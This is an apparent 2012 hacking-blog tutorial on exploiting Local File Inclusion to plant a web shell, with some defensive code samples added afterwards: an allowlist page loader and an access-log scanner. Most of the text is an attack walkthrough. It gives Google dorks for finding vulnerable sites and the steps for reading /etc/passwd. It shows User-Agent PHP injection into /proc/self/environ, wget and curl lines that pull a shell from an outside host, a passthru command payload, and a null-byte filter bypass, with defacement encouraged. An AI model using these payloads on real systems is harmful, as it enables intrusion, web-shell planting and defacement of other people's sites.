LFI and Shell Upload with Tamper Data

Posted on Sunday, 22 January 2012 by Minhal Mehdi

    Hello friends, today I'm publishing a tutorial on what LFI is, and how to upload a shell with Tamper Data through LFI on a vulnerable website.

    LFI means Local File Inclusion; it gives you access to read files on a website/server via your browser.
    I previously published a post on LFI; you can read it here.






    The URL of an LFI-vulnerable website looks like this:

    www.website.com/index.php?page=/etc/passwd


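    Here's what the code that makes it vulnerable looks like.

    <?php
    // Deliberately vulnerable: the request parameter reaches include() unchecked.
    if (isset($_GET['file'])) {
        $file = $_GET['file'];
        // The user-controlled path is loaded and executed as PHP.
        include("pages/$file");
    } else {
        include("index.php");
    }
    ?>
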
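The corrected form of the include logic above, as an added example that is not part of the original post: the request value is used only as a key into a fixed list of pages, so it never becomes part of a filesystem path. The page names and the pages/ directory layout are assumptions made for illustration.

```php
<?php
// Added example: allowlist-based page loader (hardened form of the snippet above).
// PAGES_DIR and the entries in PAGES are hypothetical names.

const PAGES_DIR = __DIR__ . '/pages';

// Public page name => file inside PAGES_DIR. Nothing else can be included.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page($requested)
{
    // Reject arrays (page[]=x) and any value that is not a known key. Paths such
    // as /etc/passwd or /proc/self/environ, and NUL-byte suffixes, fail here.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    // Defence in depth: the resolved file must exist and sit inside PAGES_DIR,
    // which also catches a symlink planted in the pages directory.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$requested = isset($_GET['page']) ? $_GET['page'] : 'home';
$path = resolve_page($requested);
if ($path === null) {
    http_response_code(404);
    exit('Page not found');
}
include $path;
```

Setting `open_basedir` to the application directory and keeping `allow_url_include` off in php.ini adds a second barrier: even if a path check is missed somewhere else, PHP itself refuses to open files under /etc or /proc.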
    A few things you need for this method

    1. Firefox
    2. Tamper Data
    3. Vulnerable sites

    or use these dorks for finding vulnerable websites
    inurl:index.php?homepage=
    inurl:index.php?page=
    inurl:index.php?index2=

    Now I'm showing how to exploit LFI and upload your shell via /proc/self/environ using Tamper Data.

    After selecting a vulnerable website, check /etc/passwd.
    Your page should come up with something that looks like this.

    [Screenshot]

    Great! Now you are sure that the website is vulnerable.
    Now check for /proc/self/environ, so change your path to /proc/self/environ.

    Your page will look like this if the file exists.
    Note - not all websites have it.

    [Screenshot]

    I'm interested in HTTP_USER_AGENT. Now I'm going to change our user agent to try to get data from the site by injecting code where our browser's user agent should be.

    To do this, I am going to use Tamper Data. Once you have it installed, go to your options, and go to Tamper Data.

    [Screenshot]

    Now you will get a window that looks like this.

    [Screenshot]



    Your page must still be /proc/self/environ.
    Click Start Tamper, and refresh your page.

    I'll try some code injection.
    After you start tampering, you should see a window that looks like this.

    [Screenshot]



    In the User-Agent field, type this 


    <?php phpinfo();?>


    Now the vulnerable website is loading;
    you will see something like this if you did it correctly.

    [Screenshot]

    Now we can execute code, so let's upload your shell.

    Open Tamper Data again, click Start Tamper, and refresh the website. This time, in the User-Agent field, enter this:


    <?exec('wget http://www.site.com/shell.txt -O shell.php');?>


    It will look like this.

    [Screenshot]

    It downloads the text file and renames it as a PHP file.
    You can upload your shell as a text file using free webhosting...
    I already shelled a website, so I am going to use that website as file hosting.

    When you're done with that, you can access your shell directly by going to http://site/shell.php

    If you are getting an error, try using the same method as when you got your
    http://www.site.com/index.php?page=/etc/passwd
    upload your shell by using the same method.
    http://www.site.com/index.php?page=shell.php

    If it loads fine the second time, you can upload your deface using the shell...
    When you are done, you have a shell, like this <3

    [Screenshot]

    Alternate method:
    Some websites take extra precautions to prevent attacks like these,
    so use this alternate method.

    Change your user agent to:


    <? passthru($_GET['cmd']); ?>


    Now load the website as
    /proc/self/environ?cmd=curl http://www.site.com/shell.txt -o shell.php
    Your URL should look like
    http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curl http://www.yoursite.com/shell.txt -o shell.php


    Now, hopefully, your shell is uploaded.
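
Seen from the server side, both the main method and the alternate method above leave the same traces in the access log: a local file path such as /proc/self/environ in the request and a PHP open tag where the User-Agent should be. The following added example (not from the original post) scans Apache combined-format log lines for those traces; the log lines, addresses and function name are constructed for illustration.

```php
<?php
// Added example: flag access-log entries that match the technique described above.
// Assumes Apache "combined" log format; the sample lines below are constructed.

const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "[^"]*" "(.*)"$/';

function inspect_line($line)
{
    if (!preg_match(LOG_RE, $line, $m)) {
        return null; // not a combined-format line
    }
    list(, $ip, $time, $method, $target, $status, $agent) = $m;
    $reasons = [];
    // Decode twice so percent-encoded and double-encoded paths are also matched.
    $decoded = rawurldecode(rawurldecode($target));
    if (preg_match('#/proc/self/environ|/etc/passwd|\x00#', $decoded)) {
        $reasons[] = 'local file path or NUL byte in request';
    }
    // A PHP open tag has no place in a User-Agent header.
    if (strpos($agent, '<?') !== false) {
        $reasons[] = 'PHP open tag in User-Agent';
    }
    // A 200 on a flagged request deserves a closer look than a 403 or 404.
    return $reasons ? compact('ip', 'time', 'target', 'status', 'reasons') : null;
}

// Constructed sample input: one normal request, two suspicious ones.
$sample = [
    '192.0.2.10 - - [22/Jan/2012:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/9.0"',
    '198.51.100.7 - - [22/Jan/2012:10:02:11 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/9.0"',
    '198.51.100.7 - - [22/Jan/2012:10:03:40 +0000] "GET /index.php?page=%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 912 "-" "<?php phpinfo();?>"',
];

foreach ($sample as $line) {
    $hit = inspect_line($line);
    if ($hit !== null) {
        printf("%s [%s] %s status=%s -> %s\n", $hit['ip'], $hit['time'],
            $hit['target'], $hit['status'], implode('; ', $hit['reasons']));
    }
}
```

A hit on the second check followed by a new .php file appearing in the web root is the point at which the host should be treated as compromised rather than merely probed.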


    Null Bytes


    Adding a , or a null byte, sometimes gets past the site's filters, and you can get around the firewalls.
    http://www.site.com/index.php?page=/etc/passwd


    Written by -DownFall







    4 comments:

    Minhal Mehdi said...

    test comment

    BliNK said...

    Very nice tut, thanks a lot, keep sharing bro :)

    Anonymous said...
    This comment has been removed by a blog administrator.
    Almas Malik said...

    It's awesome, bro.. !! *
